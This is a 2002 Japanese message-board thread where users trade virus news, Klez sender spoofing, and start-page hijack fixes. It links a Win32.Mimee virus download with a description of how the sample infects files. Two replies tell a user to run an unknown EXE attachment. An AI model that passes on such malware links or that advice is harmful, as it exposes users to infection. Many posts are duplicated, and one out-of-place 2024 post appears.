http://www.bestrsv.com/info/virus-rep010.html
912 :cheshire-cat:02/03/20 23:51
913 :名無しさん@お腹いっぱい。:02/03/20 23:54
>>911
そのページ読んで疑問なのが
>全てに渡りパソコンを使用せず、UNIX上でのプログラム作成を行って
>おりますのでファイル(ウ イルス等)が添付される事はございませんの
>でご安心ください。
の部分なんだよな。UNIXにはウィルスが無いとでも思ってるのかしら。
そのページ読んで疑問なのが
>全てに渡りパソコンを使用せず、UNIX上でのプログラム作成を行って
>おりますのでファイル(ウ イルス等)が添付される事はございませんの
>でご安心ください。
の部分なんだよな。UNIXにはウィルスが無いとでも思ってるのかしら。
914 :cheshire-cat:02/03/20 23:55
915 :名無しさん@お腹いっぱい。:02/03/21 00:53
たいていのウィルスはメールを出すときに感染者のアドレスで出すが、
Klez はこれを詐称して無関係の他人を巻き込む。あまり知られていないので要注意。
社内をアンチウィルスソフトでガチガチに固めても、知りもしない第三者によって
会社の信用が落とされてしまうという悲劇が実際にいくつも起きている。
http://a500.g.akamai.net/7/1776/484/00003/inet.trendmicro.co.jp/solutionfile/3638KLEZ_E.html
>・E-Mail送信の際の差出人:
> 「WORM_KLEZ.E」では、感染コンピュータ内で取得した任意のメールアドレス、
>または以下のアドレスのいずれかを使用します。
> メール送信の際に使用する SMTP サーバは、メールの「差出人」に設定された
>メールアドレスのドメインを使用する場合があります。差出人のメールアドレスを
>「[email protected]」として設定した場合、SMTP サーバ「smtp.somewhere.com」
>を利用します。
POP before SMTPや接続元IPアドレスでの制限をせず、Fromアドレスだけ一致していれば
送信を許可してしまうような甘い設定のメールサーバはKlezの踏台になる可能性がある。
Klez はこれを詐称して無関係の他人を巻き込む。あまり知られていないので要注意。
社内をアンチウィルスソフトでガチガチに固めても、知りもしない第三者によって
会社の信用が落とされてしまうという悲劇が実際にいくつも起きている。
http://a500.g.akamai.net/7/1776/484/00003/inet.trendmicro.co.jp/solutionfile/3638KLEZ_E.html
>・E-Mail送信の際の差出人:
> 「WORM_KLEZ.E」では、感染コンピュータ内で取得した任意のメールアドレス、
>または以下のアドレスのいずれかを使用します。
> メール送信の際に使用する SMTP サーバは、メールの「差出人」に設定された
>メールアドレスのドメインを使用する場合があります。差出人のメールアドレスを
>「[email protected]」として設定した場合、SMTP サーバ「smtp.somewhere.com」
>を利用します。
POP before SMTPや接続元IPアドレスでの制限をせず、Fromアドレスだけ一致していれば
送信を許可してしまうような甘い設定のメールサーバはKlezの踏台になる可能性がある。
916 :名無しさん@お腹いっぱい。:02/03/21 01:11
http://www.ebcvg.com/binary2.php
の
Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...
win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...
written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。
の
Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...
win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...
written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。
917 :名無しさん@お腹いっぱい。:02/03/21 20:26
age
918 :名無しさん@お腹いっぱい。:02/03/21 22:40
Subject: なし
FROM: なし
BODY: なし
ATTACHMENT: BOBNBFBO.EXE
3月11日着
二フ経由
グルグルしてもシマンテック・トレンドマイクロ
検索したけど引っかからない〜
(あんちびる 入れてないオイラも悪いけど…)
実行したくてしたくてうずうずする〜
FROM: なし
BODY: なし
ATTACHMENT: BOBNBFBO.EXE
3月11日着
二フ経由
グルグルしてもシマンテック・トレンドマイクロ
検索したけど引っかからない〜
(あんちびる 入れてないオイラも悪いけど…)
実行したくてしたくてうずうずする〜
919 :名無しさん@お腹いっぱい。:02/03/21 22:43
実行していいよ、たいしたことないし
920 :名無しさん@お腹いっぱい。:02/03/21 22:44
実行しる
921 :名無しさん@お腹いっぱい。:02/03/21 22:44
さんくす〜
923 :名無しさん@お腹いっぱい。:02/03/21 23:11
>>918
ものすごくわかりやすいファイル名(w
ものすごくわかりやすいファイル名(w
924 :ナマでパコパコ!!!!:02/03/21 23:16
925 :うーん・・・:02/03/21 23:53
W32/Fbound.c@MMのファイルを実行した友人(WIN95)から
アドレス帳が消えてしまったと…
復活の方法ってあるんでしょうか?
アドレス帳が消えてしまったと…
復活の方法ってあるんでしょうか?
926 :テイル:02/03/22 00:17
http://ime.nu/[email protected]/sg9741/index.html?yuryo
を実行してしまったんですけど直す方法はないでしょうか?;;
を実行してしまったんですけど直す方法はないでしょうか?;;
927 :ちんこ ◆SGML.ENE :02/03/22 00:30
928 :名無しさん@お腹いっぱい。:02/03/22 00:41
>>926
ページのHTMLソースを読んで、この逆をやればイイ。
ページのHTMLソースを読んで、この逆をやればイイ。
929 :テイル:02/03/22 02:06
>>928さん 逆・・・・・?
930 :名無しさん@お腹いっぱい。:02/03/22 02:20
対応方法:
一個のスクリプトのため「駆除」できません。検知した場合は、ファイルを「削除」してください。
「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場合、「駆除失敗」となることがあります。その際は、検知したファイルを「削除」していただければ、問題ありません。
スクリプトが実行された場合、Internet Explorer のスタートページなどが変更されているおそれがあります。その場合は、[ツール]−[インターネットオプション]から、設定を変更してください。
また Microsoft 社提供の最新 Internet Explorer 修正モジュールを適用するようにしてください。
一個のスクリプトのため「駆除」できません。検知した場合は、ファイルを「削除」してください。
「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場合、「駆除失敗」となることがあります。その際は、検知したファイルを「削除」していただければ、問題ありません。
スクリプトが実行された場合、Internet Explorer のスタートページなどが変更されているおそれがあります。その場合は、[ツール]−[インターネットオプション]から、設定を変更してください。
また Microsoft 社提供の最新 Internet Explorer 修正モジュールを適用するようにしてください。
931 : :02/03/22 09:53
↑無断引用
932 :名無しさん@お腹いっぱい。:02/03/22 16:16
出典はどこ?
933 :名無しさん@お腹いっぱい:02/03/22 18:48
>>932
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
さすがに無断引用とは言わないだろうけど。
コピペするんだったらリンク貼って「〜より引用」くらい書き添えましょ。>>930
ネチケッツだと思われ。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
さすがに無断引用とは言わないだろうけど。
コピペするんだったらリンク貼って「〜より引用」くらい書き添えましょ。>>930
ネチケッツだと思われ。
934 :ひみつの検疫さん:2024/12/20(金) 13:56:39 ID:MarkedRes
汚染を除去しました。
935 : :02/03/22 20:14
>>934
で、>>926に自分でやれと??
言葉数の少ない人ですな。…ま、それもいいだろうけど。
ていうかソース見てもわかんなかったから、質問してきたんだと思うけどなぁ。
>>926
ファイル名指定→"msconfig"→win.iniタブ以下の、windowsの"run= "の右側を削除して空欄に。
ついでだから"load= "も見れ。(通常、= の右側は空欄)
それから、インターネットオプションのホームページを元どおりに書き直す。
仕上げにTemporary Internet File削除→再起動
で、>>926に自分でやれと??
言葉数の少ない人ですな。…ま、それもいいだろうけど。
ていうかソース見てもわかんなかったから、質問してきたんだと思うけどなぁ。
>>926
ファイル名指定→"msconfig"→win.iniタブ以下の、windowsの"run= "の右側を削除して空欄に。
ついでだから"load= "も見れ。(通常、= の右側は空欄)
それから、インターネットオプションのホームページを元どおりに書き直す。
仕上げにTemporary Internet File削除→再起動
まもなくここは 乂1000取り合戦場乂 となります。
\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
>>935
麻衣糞のぢゃばを3805にすればそのスクリプト動かない?
麻衣糞のぢゃばを3805にすればそのスクリプト動かない?
938 : :02/03/22 20:40
>>937
実際、踏んでないからワカんない。
でも最新パッチ充てて、ActiveXとJAVA切って、javaスクも切ってたら大概防げるんじゃない?
ていうか逆にこっちが訊きたいくらい。
自分には人柱になる度胸なんてないし。
そう言えば、セキュ板には喜んで人柱になる有名な人がいるな(w
誰とは言わないけど。
実際、踏んでないからワカんない。
でも最新パッチ充てて、ActiveXとJAVA切って、javaスクも切ってたら大概防げるんじゃない?
ていうか逆にこっちが訊きたいくらい。
自分には人柱になる度胸なんてないし。
そう言えば、セキュ板には喜んで人柱になる有名な人がいるな(w
誰とは言わないけど。
939 : :02/03/22 20:42
( ゚Д゚)<939!!!
940 :cheshire-cat:02/03/22 20:45
>>937
JAVA VMが3802以上なら大丈夫、と言われてるよ。
JAVA VMが3802以上なら大丈夫、と言われてるよ。
実際に入れてる??↓
http://www.zdnet.co.jp/download/pc/tools/msjavavm_u.html
って訊こうとおもったらレスが…
>>940
>JAVA VMが3802以上なら大丈夫
と、言われても自分はちょっと→(((((;゚Д゚)))))ガクガクブルブルな状態です。
なもんでやっぱ遠慮しときます。切っててもとくに困んないし…
情報サンクス子>>cheshire-cat
http://www.zdnet.co.jp/download/pc/tools/msjavavm_u.html
って訊こうとおもったらレスが…
>>940
>JAVA VMが3802以上なら大丈夫
と、言われても自分はちょっと→(((((;゚Д゚)))))ガクガクブルブルな状態です。
なもんでやっぱ遠慮しときます。切っててもとくに困んないし…
情報サンクス子>>cheshire-cat
942 :cheshire-cat:02/03/22 21:11
943 :名無しさん@お腹いっぱい。:02/03/23 00:45
950 取った人が次スレを立てるって事でよろしく。
975 迄に立つ気配無かったらチェシャ猫さんにお願いという事で。
975 迄に立つ気配無かったらチェシャ猫さんにお願いという事で。
まもなくここは 乂1000取り合戦場乂 となります。
\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
945 :cheshire-cat:02/03/23 09:52
946 :1 ◆tHfDbgsU :02/03/23 14:23
新スレ立てるから少し待ってください
947 :名無しさん@お腹いっぱい。:02/03/23 15:16
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/l50
新スレ立ちました
(立った直後にPCがフリーズしたときは「氏ねMS!」と本気で思いました)
http://pc.2ch.net/test/read.cgi/sec/1016863569/l50
新スレ立ちました
(立った直後にPCがフリーズしたときは「氏ねMS!」と本気で思いました)
948 : :02/03/23 15:20
立てる必要があったのかと思われ
質問スレ他に2つもあるのに
質問スレ他に2つもあるのに
949 :cheshire-cat:02/03/23 15:57
>>948
リンクは便利だよ。
トレンドが鯖不調で繋がらなかったり、メール送れない。
そのせいか、定義ファイルから漏れているのが多いような気が。
Symantecは、「送る必要がないですよん」、なんて表示がでて腹立つし。
アルカリスなどは検出できない(対応しているはずなのに)。
現在メーカー製で信頼できるのは、漏れ的にはAntidote。
LZHはダメだけど。検出力には不満は無い。
Sophos早く買ってテストしようっと(楽しみ
リンクは便利だよ。
トレンドが鯖不調で繋がらなかったり、メール送れない。
そのせいか、定義ファイルから漏れているのが多いような気が。
Symantecは、「送る必要がないですよん」、なんて表示がでて腹立つし。
アルカリスなどは検出できない(対応しているはずなのに)。
現在メーカー製で信頼できるのは、漏れ的にはAntidote。
LZHはダメだけど。検出力には不満は無い。
Sophos早く買ってテストしようっと(楽しみ
950 :名無しさん@お腹いっぱい。:02/03/24 01:16
えーと、新スレ出来た以上ここはあってはならない場所なので
sage で埋め立てたいと思います。
協力してください。
sage で埋め立てたいと思います。
協力してください。
951 :名無しさん@お腹いっぱい。:02/03/24 01:16
952 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/25 07:14
953 :名無しさん@お腹いっぱい。:02/03/26 10:03
☆ウィルス情報&質問 総合スレッド☆part2 http://pc.2ch.net/test/read.cgi/sec/1016863569/l50
954 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/26 10:54
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
956 :名無しさん@埋め立て中…:02/03/26 15:16
☆ウィルス情報&質問 総合スレッド☆part2
957 :名無しさん@埋め立て中…:02/03/26 15:18
958 :名無しさん@お腹いっぱい。:02/03/26 17:02
☆ウィルス情報&質問 総合スレッド☆part2
959 : :02/03/27 07:11
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
age
971 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/30 09:07
☆ウィルス情報&質問 総合スレッド☆part2
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/
http://pc.2ch.net/test/read.cgi/sec/1016863569/
974 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/30 19:53
975 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/31 02:07
976 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/31 13:36
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/
http://pc.2ch.net/test/read.cgi/sec/1016863569/
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
999ゲト
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。